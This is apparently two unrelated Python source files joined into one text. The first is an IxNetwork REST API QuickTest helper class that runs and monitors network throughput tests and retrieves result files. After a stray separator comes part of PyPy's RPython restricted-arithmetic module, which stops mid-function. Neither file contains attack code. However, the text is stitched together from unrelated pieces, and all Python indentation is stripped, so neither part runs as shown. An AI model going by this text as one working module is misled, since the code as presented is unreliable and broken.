import re, time
from IxNetRestApi import IxNetRestApiException
from IxNetRestApiFileMgmt import FileMgmt
class QuickTest(object):
def __init__(self, ixnObj=None, fileMgmtObj=None):
self.ixnObj = ixnObj
if fileMgmtObj:
self.fileMgmtObj = fileMgmtObj
else:
self.fileMgmtObj = FileMgmt(ixnObj)
def setMainObject(self, mainObject):
# For Python Robot Framework support
self.ixnObj = mainObject
self.fileMgmtObj.setMainObject(mainObject)
def getAllQuickTestHandles(self):
"""
Description
Get all the Quick Test object handles
Returns:
['/api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2',
'/api/v1/sessions/1/ixnetwork/quickTest/rfc2889broadcastRate/1',
'/api/v1/sessions/1/ixnetwork/quickTest/rfc2889broadcastRate/2']
"""
response = self.ixnObj.get(self.ixnObj.sessionUrl+'/quickTest')
quickTestHandles = []
for eachTestId in response.json()['testIds']:
quickTestHandles.append(eachTestId)
return quickTestHandles
def getAllQuickTestNames(self):
quickTestNameList = []
for eachQtHandle in self.getAllQuickTestHandles():
response = self.ixnObj.get(self.ixnObj.httpHeader+eachQtHandle)
quickTestNameList.append(response.json()['name'])
return quickTestNameList
def getQuickTestHandleByName(self, quickTestName):
"""
Description
Get the Quick Test object handle by the name.
Parameter
quickTestName: The name of the Quick Test.
"""
for quickTestHandle in self.getAllQuickTestHandles():
response = self.ixnObj.get(self.ixnObj.httpHeader+quickTestHandle)
currentQtName = response.json()['name']
if (bool(re.match(quickTestName, currentQtName, re.I))):
return quickTestHandle
def getQuickTestNameByHandle(self, quickTestHandle):
"""
quickTestHandle = /api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2
"""
response = self.ixnObj.get(self.ixnObj.httpHeader + quickTestHandle)
return response.json()['name']
def getQuickTestDuration(self, quickTestHandle):
"""
quickTestHandle = /api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2
"""
response = self.ixnObj.get(self.ixnObj.httpHeader + quickTestHandle + '/testConfig')
return response.json()['duration']
def getQuickTestTotalFrameSizesToTest(self, quickTestHandle):
"""
quickTestHandle = /api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2
"""
response = self.ixnObj.get(self.ixnObj.httpHeader + quickTestHandle + '/testConfig')
return response.json()['framesizeList']
def applyQuickTest(self, qtHandle):
"""
Description
Apply Quick Test configurations
Parameter
qtHandle: The Quick Test object handle
"""
response = self.ixnObj.post(self.ixnObj.sessionUrl+'/quickTest/operations/apply', data={'arg1': qtHandle})
if self.ixnObj.waitForComplete(response, self.ixnObj.sessionUrl+'/quickTest/operations/apply/'+response.json()['id']) == 1:
raise IxNetRestApiException('applyQuickTest: waitForComplete failed')
def getQuickTestCurrentAction(self, quickTestHandle):
"""
quickTestHandle = /api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2
"""
ixNetworkVersion = self.ixnObj.getIxNetworkVersion()
match = re.match(r'([0-9]+)\.[^ ]+ *', ixNetworkVersion)
if int(match.group(1)) >= 8:
timer = 10
for counter in range(1,timer+1):
response = self.ixnObj.get(self.ixnObj.httpHeader+quickTestHandle+'/results', silentMode=True)
if counter < timer and response.json()['currentActions'] == []:
self.ixnObj.logInfo('getQuickTestCurrentAction is empty. Waiting %s/%s' % (counter, timer))
time.sleep(1)
continue
if counter < timer and response.json()['currentActions'] != []:
break
if counter == timer and response.json()['currentActions'] == []:
raise IxNetRestApiException('getQuickTestCurrentAction: has no current action')
return response.json()['currentActions'][-1]['arg2']
else:
response = self.ixnObj.get(self.ixnObj.httpHeader+quickTestHandle+'/results')
return response.json()['progress']
def verifyQuickTestInitialization(self, quickTestHandle):
"""
quickTestHandle = /api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2
"""
for timer in range(1,20+1):
currentAction = self.getQuickTestCurrentAction(quickTestHandle)
print('verifyQuickTestInitialization currentState: %s' % currentAction)
if timer < 20:
if currentAction == 'TestEnded' or currentAction == 'None':
self.ixnObj.logInfo('\nverifyQuickTestInitialization CurrentState = %s\n\tWaiting %s/20 seconds to change state' % (currentAction, timer))
time.sleep(1)
continue
else:
break
if timer >= 20:
if currentAction == 'TestEnded' or currentAction == 'None':
self.ixnObj.showErrorMessage()
raise IxNetRestApiException('Quick Test is stuck at TestEnded.')
ixNetworkVersionNumber = int(self.ixnObj.getIxNetworkVersion().split('.')[0])
applyQuickTestCounter = 60
for counter in range(1,applyQuickTestCounter+1):
quickTestApplyStates = ['InitializingTest', 'ApplyFlowGroups', 'SetupStatisticsCollection']
currentAction = self.getQuickTestCurrentAction(quickTestHandle)
if currentAction == None:
currentAction = 'ApplyingAndInitializing'
print('\nverifyQuickTestInitialization: %s Expecting: TransmittingFrames\n\tWaiting %s/%s seconds' % (currentAction, counter, applyQuickTestCounter))
if ixNetworkVersionNumber >= 8:
if counter < applyQuickTestCounter and currentAction != 'TransmittingFrames':
time.sleep(1)
continue
if counter < applyQuickTestCounter and currentAction == 'TransmittingFrames':
self.ixnObj.logInfo('\nVerifyQuickTestInitialization is done applying configuration and has started transmitting frames\n')
break
if ixNetworkVersionNumber < 8:
if counter < applyQuickTestCounter and currentAction == 'ApplyingAndInitializing':
time.sleep(1)
continue
if counter < applyQuickTestCounter and currentAction != 'ApplyingAndInitializing':
self.ixnObj.logInfo('\nVerifyQuickTestInitialization is done applying configuration and has started transmitting frames\n')
break
if counter == applyQuickTestCounter:
if ixNetworkVersionNumber >= 8 and currentAction != 'TransmittingFrames':
self.ixnObj.showErrorMessage()
if currentAction == 'ApplyFlowGroups':
self.ixnObj.logInfo('\nIxNetwork is stuck on Applying Flow Groups. You need to go to the session to FORCE QUIT it.\n')
raise IxNetRestApiException('\nVerifyQuickTestInitialization is stuck on %s. Waited %s/%s seconds' % (
currentAction, counter, applyQuickTestCounter))
if ixNetworkVersionNumber < 8 and currentAction != 'Trial':
self.ixnObj.showErrorMessage()
raise IxNetRestApiException('\nVerifyQuickTestInitialization is stuck on %s. Waited %s/%s seconds' % (
currentAction, counter, applyQuickTestCounter))
def startQuickTest(self, quickTestHandle):
"""
Description
Start a Quick Test
Parameter
quickTestHandle: The Quick Test object handle.
/api/v1/sessions/{id}/ixnetwork/quickTest/rfc2544throughput/2
Syntax
POST: http://{apiServerIp:port}/api/v1/sessions/{1}/ixnetwork/quickTest/operations/start
data={arg1: '/api/v1/sessions/{id}/ixnetwork/quickTest/rfc2544throughput/2'}
headers={'content-type': 'application/json'}
"""
url = self.ixnObj.sessionUrl+'/quickTest/operations/start'
self.ixnObj.logInfo('\nstartQuickTest:%s' % url)
response = self.ixnObj.post(url, data={'arg1': quickTestHandle})
if self.ixnObj.waitForComplete(response, url+'/'+response.json()['id']) == 1:
raise IxNetRestApiException
def stopQuickTest(self, quickTestHandle):
"""
Description
Stop the Quick Test.
Parameter
quickTestHandle: The Quick Test object handle.
/api/v1/sessions/{id}/ixnetwork/quickTest/rfc2544throughput/2
Syntax
POST: http://{apiServerIp:port}/api/v1/sessions/{1}/ixnetwork/quickTest/operations/stop
data={arg1: '/api/v1/sessions/{id}/ixnetwork/quickTest/rfc2544throughput/2'}
headers={'content-type': 'application/json'}
"""
url = self.ixnObj.sessionUrl+'/quickTest/operations/stop'
response = self.ixnObj.post(url, data={'arg1': quickTestHandle})
if self.ixnObj.waitForComplete(response, url+'/'+response.json()['id']) == 1:
raise IxNetRestApiException
def monitorQuickTestRunningProgress(self, quickTestHandle, getProgressInterval=10):
"""
Description
Monitor the Quick Test running progress.
For the Linux API server only: the configuration must be NGPF (the Classic Framework is not supported by the REST API).
Parameters
quickTestHandle: /api/v1/sessions/{1}/ixnetwork/quickTest/rfc2544throughput/2
"""
isRunningBreakFlag = 0
trafficStartedFlag = 0
waitForRunningProgressCounter = 0
counter = 1
while True:
response = self.ixnObj.get(self.ixnObj.httpHeader+quickTestHandle+'/results', silentMode=True)
isRunning = response.json()['isRunning']
if isRunning == True:
response = self.ixnObj.get(self.ixnObj.httpHeader+quickTestHandle+'/results', silentMode=True)
currentRunningProgress = response.json()['progress']
if bool(re.match('^Trial.*', currentRunningProgress)) == False:
if waitForRunningProgressCounter < 30:
self.ixnObj.logInfo('isRunning=True. Waiting for trial runs {0}/30 seconds'.format(waitForRunningProgressCounter))
waitForRunningProgressCounter += 1
time.sleep(1)
if waitForRunningProgressCounter == 30:
raise IxNetRestApiException('isRunning=True. No quick test stats showing.')
else:
trafficStartedFlag = 1
self.ixnObj.logInfo(currentRunningProgress)
counter += 1
time.sleep(getProgressInterval)
continue
else:
if trafficStartedFlag == 1:
# We only care about traffic not running in the beginning.
# If traffic ran and stopped, then break out.
self.ixnObj.logInfo('\nisRunning=False. Quick Test is complete')
return 0
if isRunningBreakFlag < 20:
print('isRunning=False. Wait {0}/20 seconds'.format(isRunningBreakFlag))
isRunningBreakFlag += 1
time.sleep(1)
continue
if isRunningBreakFlag == 20:
raise IxNetRestApiException('Quick Test failed to start:', response.json()['status'])
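# Illustrative flow using the methods above (a sketch only; 'qt' is a QuickTest
# instance, the test name is made up, and the exact call order depends on how the
# Quick Test is configured in IxNetwork):
#
#   handle = qt.getQuickTestHandleByName('Throughput_64B')
#   qt.applyQuickTest(handle)
#   qt.startQuickTest(handle)
#   qt.verifyQuickTestInitialization(handle)
#   qt.monitorQuickTestRunningProgress(handle)
#   resultPath = qt.getQuickTestResultPath(handle)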
def getQuickTestResultPath(self, quickTestHandle):
"""
quickTestHandle = /api/v1/sessions/1/ixnetwork/quickTest/rfc2544throughput/2
"""
response = self.ixnObj.get(self.ixnObj.httpHeader + quickTestHandle + '/results')
# "resultPath": "C:\\Users\\hgee\\AppData\\Local\\Ixia\\IxNetwork\\data\\result\\DP.Rfc2544Tput\\10694b39-6a8a-4e70-b1cd-52ec756910c3\\Run0001"
return response.json()['resultPath']
def getQuickTestResult(self, quickTestHandle, attribute):
"""
Description
Get Quick Test result attributes
Parameter
quickTestHandle: The Quick Test object handle
attribute options to get:
result - Returns pass
status - Returns none
progress - blank or Trial 1/1 Iteration 1, Size 64, Rate 10 % Wait for 2 seconds Wait 70.5169449%complete
startTime - Returns 04/21/17 14:35:42
currentActions
waitingStatus
resultPath
isRunning - Returns True or False
trafficStatus
duration - Returns 00:01:03
currentViews
"""
response = self.ixnObj.get(self.ixnObj.httpHeader + quickTestHandle + '/results')
return response.json()[attribute]
def getQuickTestCsvFiles(self, quickTestHandle, copyToPath, csvFile='all'):
"""
Description
Copy Quick Test CSV result files to a specified path on either Windows or Linux.
Note: Currently only supports copying from Windows.
Copy from Linux is coming in November.
quickTestHandle: The Quick Test handle.
copyToPath: The destination path to copy to.
If copy to Windows: c:\\Results\\Path
If copy to Linux: /home/user1/results/path
csvFile: A list of CSV files to get: 'all', one or more CSV files to get:
AggregateResults.csv, iteration.csv, results.csv, logFile.txt, portMap.csv
"""
resultsPath = self.getQuickTestResultPath(quickTestHandle)
self.ixnObj.logInfo('\ngetQuickTestCsvFiles: %s' % resultsPath)
if csvFile == 'all':
getCsvFiles = ['AggregateResults.csv', 'iteration.csv', 'results.csv', 'logFile.txt', 'portMap.csv']
else:
if type(csvFile) is not list:
getCsvFiles = [csvFile]
else:
getCsvFiles = csvFile
for eachCsvFile in getCsvFiles:
# Backslash indicates the results resides on a Windows OS.
if '\\' in resultsPath:
if bool(re.match('[a-z]:.*', copyToPath, re.I)):
self.fileMgmtObj.copyFileWindowsToLocalWindows(resultsPath+'\\{0}'.format(eachCsvFile), copyToPath)
else:
self.fileMgmtObj.copyFileWindowsToLocalLinux(resultsPath+'\\{0}'.format(eachCsvFile), copyToPath)
else:
# TODO: Copy from Linux to Windows and Linux to Linux.
pass
def getQuickTestPdf(self, quickTestHandle, copyToLocalPath, where='remoteLinux', renameDestinationFile=None, includeTimestamp=False):
"""
Description
Generate Quick Test result to PDF and retrieve the PDF result file.
Parameter
where: localWindows|remoteWindows|remoteLinux. The destination.
copyToLocalPath: The local destination path to store the PDF result file.
renameDestinationFile: Rename the PDF file.
includeTimestamp: True|False. Set to True if you don't want to overwrite previous result file.
"""
response = self.ixnObj.post(self.ixnObj.httpHeader+quickTestHandle+'/operations/generateReport', data={'arg1': quickTestHandle})
if response.json()['url'] != '':
if self.ixnObj.waitForComplete(response, self.ixnObj.httpHeader+response.json()['url']) == 1:
raise IxNetRestApiException
if where == 'localWindows':
response = self.ixnObj.get(self.ixnObj.httpHeader+response.json()['url'])
self.fileMgmtObj.copyFileWindowsToLocalWindows(response.json()['result'], copyToLocalPath, renameDestinationFile, includeTimestamp)
if where == 'remoteWindows':
# TODO: Work in progress. Not sure if this is possible.
resultPath = self.getQuickTestResultPath(quickTestHandle)
#self.ixnObj.copyFileWindowsToRemoteWindows(response.json()['result'], copyToLocalPath, renameDestinationFile, includeTimestamp)
self.fileMgmtObj.copyFileWindowsToRemoteWindows(resultPath, copyToLocalPath, renameDestinationFile, includeTimestamp)
if where == 'remoteLinux':
linuxResultPath = self.getQuickTestResultPath(quickTestHandle)
self.fileMgmtObj.copyFileWindowsToLocalLinux(linuxResultPath+'\\TestReport.pdf', copyToLocalPath, renameDestinationFile, includeTimestamp)
else:
self.ixnObj.logInfo('\ngetQuickTestPdf failed. Result path = %s' % response.json()['result'])
def runQuickTest(self, quickTestName, timeout=90):
"""
Description
Run the Quick test
Parameter
quickTestName: <str>: name of the quick test to run
timeout: <int>: duration for quick test to run. Default=90 seconds
Example
runQuickTest("Macro_17_57_14_294", timeout=180)
Return
Note: the run operation keeps polling the execution status for up to the specified timeout.
"""
eventSchedulerHandle = self.getQuickTestHandleByName(quickTestName)
url = self.ixnObj.sessionUrl + '/quickTest/eventScheduler/operations/run'
data = {"arg1": eventSchedulerHandle}
response = self.ixnObj.post(url, data=data)
self.ixnObj.waitForComplete(response, url + '/' + response.json()['id'], timeout=timeout)
def deleteQuickTest(self, quickTestName):
"""
Description
Delete the Quick test.
Parameter
quickTestName: <str>: name of the quick test to delete
Example
deleteQuickTest("Macro_17_57_14_294")
Return
"""
eventSchedulerHandle = self.getQuickTestHandleByName(quickTestName)
#delete the quick test
url = self.ixnObj.httpHeader + eventSchedulerHandle
self.ixnObj.delete(url)
def configQuickTest(self, quickTestName, numOfTrials=1):
"""
Description
Configure a quick test
Parameter
quickTestName: <str>: name of the quick test to configure
numOfTrials: <int>: number of iterations to run the quick test, default is 1
Example
configQuickTest("Macro_17_57_14_294")
configQuickTest("Macro_17_57_14_294", numOfTrials=2)
Return
event scheduler handle on success or exception on failure
"""
url = self.ixnObj.sessionUrl + '/quickTest/eventScheduler'
response = self.ixnObj.post(url, data={"forceApplyQTConfig": "true", "mode": "existingMode", "name": quickTestName})
eventSchedulerHandle = response.json()["links"][0]["href"]
url = self.ixnObj.httpHeader + eventSchedulerHandle + '/eventScheduler'
self.ixnObj.post(url, data={"enabled": "true", "itemId": quickTestName, "itemName": quickTestName})
url = self.ixnObj.httpHeader + eventSchedulerHandle + '/testConfig'
self.ixnObj.patch(url, data={"numTrials": numOfTrials})
return eventSchedulerHandle
|
"""
This file defines restricted arithmetic:
classes and operations to express integer arithmetic,
such that before and after translation semantics are
consistent
r_uint an unsigned integer which has no overflow
checking. It is always positive and always
truncated to the internal machine word size.
intmask mask a possibly long value when running on CPython
back to a signed int value
ovfcheck check on CPython whether the result of a signed
integer operation did overflow
ovfcheck_float_to_int
convert to an integer or raise OverflowError
r_longlong
like r_int but double word size
r_ulonglong
like r_uint but double word size
widen(x)
if x is of a type smaller than lltype.Signed or
lltype.Unsigned, widen it to lltype.Signed.
Useful because the translator doesn't support
arithmetic on the smaller types.
These are meant to be erased by translation, r_uint
in the process should mark unsigned values, ovfcheck should
mark where overflow checking is required.
"""
import sys, struct
from rpython.rtyper import extregistry
from rpython.rlib import objectmodel
from rpython.flowspace.model import Constant, const
from rpython.flowspace.specialcase import register_flow_sc
"""
Long-term target:
We want to make pypy very flexible concerning its data type layout.
This is a larger task for later.
Short-term target:
We want to run PyPy on windows 64 bit.
Problem:
On windows 64 bit, integers are only 32 bit. This is a problem for PyPy
right now, since it assumes that a c long can hold a pointer.
We therefore set up the target machine constants to obey this rule.
Right now this affects 64 bit Python only on windows.
Note: We use the struct module, because the array module doesn't support
all typecodes.
"""
def _get_bitsize(typecode):
return len(struct.pack(typecode, 1)) * 8
_long_typecode = 'l'
if _get_bitsize('P') > _get_bitsize('l'):
_long_typecode = 'P'
def _get_long_bit():
# whatever size a long has, make it big enough for a pointer.
return _get_bitsize(_long_typecode)
# exported for now for testing array values.
# might go into its own module.
def get_long_pattern(x):
"""get the bit pattern for a long, adjusted to pointer size"""
return struct.pack(_long_typecode, x)
# used in tests for ctypes and for genc and friends
# to handle the win64 special case:
is_emulated_long = _long_typecode != 'l'
LONG_BIT = _get_long_bit()
LONG_MASK = (2**LONG_BIT)-1
LONG_TEST = 2**(LONG_BIT-1)
# XXX this is a good guess, but what if a long long is 128 bit?
LONGLONG_BIT = 64
LONGLONG_MASK = (2**LONGLONG_BIT)-1
LONGLONG_TEST = 2**(LONGLONG_BIT-1)
LONG_BIT_SHIFT = 0
while (1 << LONG_BIT_SHIFT) != LONG_BIT:
LONG_BIT_SHIFT += 1
assert LONG_BIT_SHIFT < 99, "LONG_BIT_SHIFT value not found?"
LONGLONGLONG_BIT = 128
LONGLONGLONG_MASK = (2**LONGLONGLONG_BIT)-1
LONGLONGLONG_TEST = 2**(LONGLONGLONG_BIT-1)
"""
int is no longer necessarily the same size as the target int.
We therefore can no longer use the int type as it is, but need
to use long everywhere.
"""
# XXX returning int(n) should not be necessary and should be simply n.
# XXX TODO: replace all int(n) by long(n) and fix everything that breaks.
# XXX Then relax it and replace int(n) by n.
def intmask(n):
"""
NOT_RPYTHON
"""
if isinstance(n, objectmodel.Symbolic):
return n # assume Symbolics don't overflow
assert not isinstance(n, float)
if is_valid_int(n):
return int(n)
n = long(n)
n &= LONG_MASK
if n >= LONG_TEST:
n -= 2*LONG_TEST
return int(n)
def longlongmask(n):
"""
NOT_RPYTHON
"""
assert isinstance(n, (int, long))
n = long(n)
n &= LONGLONG_MASK
if n >= LONGLONG_TEST:
n -= 2*LONGLONG_TEST
return r_longlong(n)
def longlonglongmask(n):
# Assume longlonglong doesn't overflow. This is perfectly fine for rbigint.
# We deal directly with overflow there anyway.
return r_longlonglong(n)
def widen(n):
from rpython.rtyper.lltypesystem import lltype
if _should_widen_type(lltype.typeOf(n)):
return intmask(n)
else:
return n
widen._annspecialcase_ = 'specialize:argtype(0)'
def _should_widen_type(tp):
from rpython.rtyper.lltypesystem import lltype, rffi
if tp is lltype.Bool:
return True
if tp is lltype.Signed:
return False
r_class = rffi.platform.numbertype_to_rclass[tp]
assert issubclass(r_class, base_int)
return r_class.BITS < LONG_BIT or (
r_class.BITS == LONG_BIT and r_class.SIGNED)
_should_widen_type._annspecialcase_ = 'specialize:memo'
# the replacement for sys.maxint
maxint = int(LONG_TEST - 1)
# for now, it should be equal to sys.maxint on all supported platforms
assert maxint == sys.maxint
def is_valid_int(r):
if objectmodel.we_are_translated():
return isinstance(r, int)
return isinstance(r, (base_int, int, long, bool)) and (
-maxint - 1 <= r <= maxint)
is_valid_int._annspecialcase_ = 'specialize:argtype(0)'
def ovfcheck(r):
"NOT_RPYTHON"
# to be used as ovfcheck(x <op> y)
# raise OverflowError if the operation did overflow
assert not isinstance(r, r_uint), "unexpected ovf check on unsigned"
assert not isinstance(r, r_longlong), "ovfcheck not supported on r_longlong"
assert not isinstance(r, r_ulonglong), "ovfcheck not supported on r_ulonglong"
if type(r) is long and not is_valid_int(r):
# checks only if applicable to r's type.
# this happens in the garbage collector.
raise OverflowError("signed integer expression did overflow")
return r
# Strange things happening for float to int on 64 bit:
# int(float(i)) != i because of rounding issues.
# These are the minimum and maximum float values that can
# successfully be cast to an int.
if sys.maxint == 2147483647:
def ovfcheck_float_to_int(x):
from rpython.rlib.rfloat import isnan
if isnan(x):
raise OverflowError
if -2147483649.0 < x < 2147483648.0:
return int(x)
raise OverflowError
else:
# The following values are not quite +/-sys.maxint.
# Note the "<= x <" here, as opposed to "< x <" above.
# This is justified by test_typed in translator/c/test.
def ovfcheck_float_to_int(x):
from rpython.rlib.rfloat import isnan
if isnan(x):
raise OverflowError
if -9223372036854776832.0 <= x < 9223372036854775296.0:
return int(x)
raise OverflowError
def compute_restype(self_type, other_type):
if self_type is other_type:
if self_type is bool:
return int
return self_type
if other_type in (bool, int, long):
if self_type is bool:
return int
return self_type
if self_type in (bool, int, long):
return other_type
if self_type is float or other_type is float:
return float
if self_type.SIGNED == other_type.SIGNED:
return build_int(None, self_type.SIGNED, max(self_type.BITS, other_type.BITS))
raise AssertionError("Merging these types (%s, %s) is not supported" % (self_type, other_type))
def signedtype(t):
if t in (bool, int, long):
return True
else:
return t.SIGNED
signedtype._annspecialcase_ = 'specialize:memo'
def normalizedinttype(t):
if t is int:
return int
if t.BITS <= r_int.BITS:
return build_int(None, t.SIGNED, r_int.BITS)
else:
assert t.BITS <= r_longlong.BITS
return build_int(None, t.SIGNED, r_longlong.BITS)
def most_neg_value_of_same_type(x):
from rpython.rtyper.lltypesystem import lltype
return most_neg_value_of(lltype.typeOf(x))
most_neg_value_of_same_type._annspecialcase_ = 'specialize:argtype(0)'
def most_neg_value_of(tp):
from rpython.rtyper.lltypesystem import lltype, rffi
if tp is lltype.Signed:
return -sys.maxint-1
r_class = rffi.platform.numbertype_to_rclass[tp]
assert issubclass(r_class, base_int)
if r_class.SIGNED:
return r_class(-(r_class.MASK >> 1) - 1)
else:
return r_class(0)
most_neg_value_of._annspecialcase_ = 'specialize:memo'
def most_pos_value_of_same_type(x):
from rpython.rtyper.lltypesystem import lltype
return most_pos_value_of(lltype.typeOf(x))
most_pos_value_of_same_type._annspecialcase_ = 'specialize:argtype(0)'
def most_pos_value_of(tp):
from rpython.rtyper.lltypesystem import lltype, rffi
if tp is lltype.Signed:
return sys.maxint
r_class = rffi.platform.numbertype_to_rclass[tp]
assert issubclass(r_class, base_int)
if r_class.SIGNED:
return r_class(r_class.MASK >> 1)
else:
return r_class(r_class.MASK)
most_pos_value_of._annspecialcase_ = 'specialize:memo'
def is_signed_integer_type(tp):
from rpython.rtyper.lltypesystem import lltype, rffi
if tp is lltype.Signed:
return True
try:
r_class = rffi.platform.numbertype_to_rclass[tp]
return r_class.SIGNED
except KeyError:
return False # not an integer type
is_signed_integer_type._annspecialcase_ = 'specialize:memo'
def highest_bit(n):
"""
Calculates the highest set bit in n. This function assumes that n is a
power of 2 (and thus only has a single set bit).
"""
assert n and (n & (n - 1)) == 0
i = -1
while n:
i += 1
n >>= 1
return i
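# For example, highest_bit(1) == 0 and highest_bit(64) == 6; n must be a power of two.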
class base_int(long):
""" fake unsigned integer implementation """
def _widen(self, other, value):
"""
if one argument is int or long, the other type wins.
if one argument is float, the result is float.
otherwise, produce the largest class to hold the result.
"""
self_type = type(self)
other_type = type(other)
try:
return self.typemap[self_type, other_type](value)
except KeyError:
pass
restype = compute_restype(self_type, other_type)
self.typemap[self_type, other_type] = restype
return restype(value)
def __new__(klass, val):
if klass is base_int:
raise TypeError("abstract base!")
else:
return super(base_int, klass).__new__(klass, val)
def __add__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x + y)
__radd__ = __add__
def __sub__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x - y)
def __rsub__(self, other):
y = long(self)
x = long(other)
return self._widen(other, x - y)
def __mul__(self, other):
x = long(self)
if not isinstance(other, (int, long)):
return x * other
y = long(other)
return self._widen(other, x * y)
__rmul__ = __mul__
def __div__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x // y)
__floordiv__ = __div__
def __rdiv__(self, other):
y = long(self)
x = long(other)
return self._widen(other, x // y)
__rfloordiv__ = __rdiv__
def __mod__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x % y)
def __rmod__(self, other):
y = long(self)
x = long(other)
return self._widen(other, x % y)
def __divmod__(self, other):
x = long(self)
y = long(other)
res = divmod(x, y)
return (self.__class__(res[0]), self.__class__(res[1]))
def __lshift__(self, n):
x = long(self)
y = long(n)
return self.__class__(x << y)
def __rlshift__(self, n):
y = long(self)
x = long(n)
return self._widen(n, x << y)
def __rshift__(self, n):
x = long(self)
y = long(n)
return self._widen(n, x >> y)
def __rrshift__(self, n):
y = long(self)
x = long(n)
return self._widen(n, x >> y)
def __or__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x | y)
__ror__ = __or__
def __and__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x & y)
__rand__ = __and__
def __xor__(self, other):
x = long(self)
y = long(other)
return self._widen(other, x ^ y)
__rxor__ = __xor__
def __neg__(self):
x = long(self)
return self.__class__(-x)
def __abs__(self):
x = long(self)
return self.__class__(abs(x))
def __pos__(self):
return self.__class__(self)
def __invert__(self):
x = long(self)
return self.__class__(~x)
def __pow__(self, other, m=None):
x = long(self)
y = long(other)
res = pow(x, y, m)
return self._widen(other, res)
def __rpow__(self, other, m=None):
y = long(self)
x = long(other)
res = pow(x, y, m)
return self._widen(other, res)
class signed_int(base_int):
SIGNED = True
def __new__(klass, val=0):
if isinstance(val, (float, str)):
val = long(val)
if val > klass.MASK >> 1 or val < -(klass.MASK >> 1) - 1:
raise OverflowError("%s does not fit in signed %d-bit integer" % (val, klass.BITS))
if val < 0:
val = ~ ((~val) & klass.MASK)
return super(signed_int, klass).__new__(klass, val)
typemap = {}
class unsigned_int(base_int):
SIGNED = False
def __new__(klass, val=0):
if isinstance(val, (float, long, str)):
val = long(val)
return super(unsigned_int, klass).__new__(klass, val & klass.MASK)
typemap = {}
_inttypes = {}
def build_int(name, sign, bits, force_creation=False):
sign = bool(sign)
if not force_creation:
try:
return _inttypes[sign, bits]
except KeyError:
pass
if sign:
base_int_type = signed_int
else:
base_int_type = unsigned_int
mask = (2 ** bits) - 1
if name is None:
raise TypeError('No predefined %sint%d'%(['u', ''][sign], bits))
int_type = type(name, (base_int_type,), {'MASK': mask,
'BITS': bits,
'SIGN': sign})
if not force_creation:
_inttypes[sign, bits] = int_type
class ForValuesEntry(extregistry.ExtRegistryEntry):
_type_ = int_type
def compute_annotation(self):
from rpython.annotator import model as annmodel
return annmodel.SomeInteger(knowntype=int_type)
class ForTypeEntry(extregistry.ExtRegistryEntry):
_about_ = int_type
def compute_result_annotation(self, *args_s, **kwds_s):
from rpython.annotator import model as annmodel
return annmodel.SomeInteger(knowntype=int_type)
def specialize_call(self, hop):
v_result, = hop.inputargs(hop.r_result.lowleveltype)
hop.exception_cannot_occur()
return v_result
return int_type
class BaseIntValueEntry(extregistry.ExtRegistryEntry):
_type_ = base_int
def compute_annotation(self):
from rpython.annotator import model as annmodel
return annmodel.SomeInteger(knowntype=r_ulonglong)
class BaseIntTypeEntry(extregistry.ExtRegistryEntry):
_about_ = base_int
def compute_result_annotation(self, *args_s, **kwds_s):
raise TypeError("abstract base!")
r_int = build_int('r_int', True, LONG_BIT)
r_uint = build_int('r_uint', False, LONG_BIT)
@register_flow_sc(r_uint)
def sc_r_uint(ctx, w_value):
# (normally, the 32-bit constant is a long, and is not allowed to
# show up in the flow graphs at all)
if isinstance(w_value, Constant):
return Constant(r_uint(w_value.value))
return ctx.appcall(r_uint, w_value)
r_longlong = build_int('r_longlong', True, 64)
r_ulonglong = build_int('r_ulonglong', False, 64)
r_longlonglong = build_int('r_longlonglong', True, 128)
longlongmax = r_longlong(LONGLONG_TEST - 1)
if r_longlong is not r_int:
r_int64 = r_longlong
r_uint64 = r_ulonglong
r_int32 = int # XXX: what about r_int
r_uint32 = r_uint
else:
r_int64 = int # XXX: what about r_int
r_uint64 = r_uint # is r_ulonglong
r_int32 = build_int('r_int32', True, 32) # also needed for rposix_stat.time_t_to_FILE_TIME in the 64 bit case
r_uint32 = build_int('r_uint32', False, 32)
SHRT_MIN = -2**(_get_bitsize('h') - 1)
SHRT_MAX = 2**(_get_bitsize('h') - 1) - 1
USHRT_MAX = 2**_get_bitsize('h') - 1
INT_MIN = int(-2**(_get_bitsize('i') - 1))
INT_MAX = int(2**(_get_bitsize('i') - 1) - 1)
UINT_MAX = r_uint(2**_get_bitsize('i') - 1)
# the 'float' C type
class r_singlefloat(object):
"""A value of the C type 'float'.
This is a single-precision floating-point number.
Regular 'float' values in Python and RPython are double-precision.
Note that we consider this as a black box for now - the only thing
you can do with it is cast it back to a regular float."""
def __init__(self, floatval):
import struct
# simulates the loss of precision
self._bytes = struct.pack("f", floatval)
def __float__(self):
import struct
return struct.unpack("f", self._bytes)[0]
def __nonzero__(self):
raise TypeError("not supported on r_singlefloat instances")
def __cmp__(self, other):
raise TypeError("not supported on r_singlefloat instances")
def __eq__(self, other):
return self.__class__ is other.__class__ and self._bytes == other._bytes
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return 'r_singlefloat(%s)' % (float(self),)
class r_longfloat(object):
"""A value of the C type 'long double'.
Note that we consider this as a black box for now - the only thing
you can do with it is cast it back to a regular float."""
def __init__(self, floatval):
self.value = floatval
def __float__(self):
return self.value
def __nonzero__(self):
raise TypeError("not supported on r_longfloat instances")
def __cmp__(self, other):
raise TypeError("not supported on r_longfloat instances")
def __eq__(self, other):
return self.__class__ is other.__class__ and self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
class For_r_singlefloat_values_Entry(extregistry.ExtRegistryEntry):
_type_ = r_singlefloat
def compute_annotation(self):
from rpython.annotator import model as annmodel
return annmodel.SomeSingleFloat()
class For_r_singlefloat_type_Entry(extregistry.ExtRegistryEntry):
_about_ = r_singlefloat
def compute_result_annotation(self, *args_s, **kwds_s):
from rpython.annotator import model as annmodel
return annmodel.SomeSingleFloat()
def specialize_call(self, hop):
from rpython.rtyper.lltypesystem import lltype
v, = hop.inputargs(lltype.Float)
hop.exception_cannot_occur()
